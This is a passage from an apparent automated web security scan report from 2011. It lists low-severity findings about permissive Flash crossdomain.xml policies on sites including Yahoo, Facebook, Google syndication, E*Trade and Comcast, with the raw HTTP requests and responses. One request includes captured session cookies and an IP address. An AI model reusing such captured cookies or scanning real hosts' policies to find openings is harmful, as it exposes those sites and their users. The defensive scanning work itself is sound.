Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: maps.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.72. http://media.sonypictures.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.sonypictures.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.sonypictures.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Type: application/xml
Age: 204157
Date: Tue, 06 Sep 2011 12:45:10 GMT
Last-Modified: Mon, 09 May 2011 23:28:45 GMT
Content-Length: 965
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.sonypictures.com"/>
<allow-access-from domain="*.avatarlabs.com"/>
<allow-access-from domain="*.client-projects.com"/>
<allow-access-from domain="*.eyewonderlabs.com"/>
<allow-access-from domain="*.eyewonder.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.doubleclick.com"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.dartmotif.net"/>
<allow-access-from domain="*.gstatic.com"/>
<allow-access-from domain="*.wovencube.org"/>
<allow-access-from domain="*.wovencube.biz"/>
<allow-access-from domain="*.wovencube.com"/>
...[SNIP]...

3.73. http://mi.adinterax.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mi.adinterax.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mi.adinterax.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7776000
Date: Tue, 06 Sep 2011 12:44:47 GMT
Content-Length: 708
Content-Type: application/xml
Expires: Wed, 02 Nov 2011 09:39:00 GMT
Last-Modified: Thu, 02 Sep 2010 20:10:03 GMT
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com" />
<allow-access-from domain="adinterax.cnet.com.edgesuite.net" />
<allow-access-from domain="adinterax.myspace.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

3.74. http://movies.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://movies.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: movies.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:58 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Content-Type: application/xml
Age: 0
Server: YTS/1.20.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.75. http://music.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://music.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: music.yahoo.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 265
Content-Type: text/xml
Last-Modified: Fri, 12 May 2006 20:13:33 GMT
Accept-Ranges: bytes
ETag: "30a7778b076c61:16afec"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 12:45:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

3.76. http://new.music.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: new.music.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 22 Aug 2011 13:09:31 GMT
Accept-Ranges: bytes
Content-Length: 287
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="l.yimg.com" secure="false"/>
...[SNIP]...

3.77. http://omg.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: omg.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:45:20 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 28 Mar 2011 09:57:27 GMT
Accept-Ranges: bytes
Content-Length: 259
Content-Type: application/xml
Age: 0
Server: YTS/1.20.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

3.78. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:53 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

3.79. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Mon, 05 Sep 2011 23:23:50 GMT
Expires: Tue, 06 Sep 2011 23:23:50 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 47163
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.80. http://realestate.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: realestate.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/x-httpd-php

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.81. http://scottrade.wsod.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: scottrade.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:48:47 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "9d595a-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

3.82. http://search.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 29 Oct 2009 00:28:40 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.83. http://shopping.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: shopping.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 17 Jun 2010 15:57:01 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/x-httpd-template

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.84. http://sports.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sports.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host
Last-Modified: Mon, 28 Sep 2009 17:09:24 GMT
Accept-Ranges: bytes
Content-Length: 346
Content-Type: application/xml
Age: 0
Via: HTTP/1.1 r5.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mlb.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yimg.com" secure="false" />
...[SNIP]...

3.85. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.146.199
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:41 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.86. https://us.etrade.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.etrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:08 GMT
Server: Apache
Last-Modified: Tue, 19 Oct 2010 16:10:27 GMT
ETag: "119-4cbdc2f3"
Accept-Ranges: bytes
Content-Length: 281
Keep-Alive: timeout=60, max=399
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.etrade.com" />
<allow-access-from domain="a248.e.akamai.net" />
<allow-access-from domain="*.etradegrp.com" />
...[SNIP]...

3.87. http://video.music.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://video.music.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: video.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://d.yimg.com/m/up/fop/embedflv/swf/fop.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Thu, 11 Mar 2010 22:48:23 GMT
Accept-Ranges: bytes
Content-Length: 1119
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:
...[SNIP]...
<allow-access-from domain="*.yahoo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.broadcast.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.launch.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.rivals.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.hotjobs.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.yimg.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.yahooligans.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.overture.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.flickr.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.vap.yahoo.net" secure="true" />
...[SNIP]...

3.88. http://www.comcast.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.comcast.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.58 (Unix)
Last-Modified: Tue, 14 Sep 2010 01:19:26 GMT
ETag: "25d5d5-444-f82380"
Accept-Ranges: bytes
Content-Length: 1092
Content-Type: application/xml
Cache-Control: max-age=2592000
Date: Tue, 06 Sep 2011 12:22:14 GMT
Connection: close

<?xml version="1.0"?>

<!--static-->

<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.xfinity.com"/>
<allow-access-from domain="*.fancast.com"/>
<allow-access-from domain="beta.comcast.net" />
<allow-access-from domain="*.cimcontent.net" />
<allow-access-from domain="chrome.comcast.net" />
<allow-access-from domain="static.comcast.net" />
<allow-access-from domain="por-img.cimcontent.net" />
<allow-access-from domain="comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcastonline.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.att.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.xcal.tv" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.teamcomcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" secure="false"/>
...[SNIP]...

3.89. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

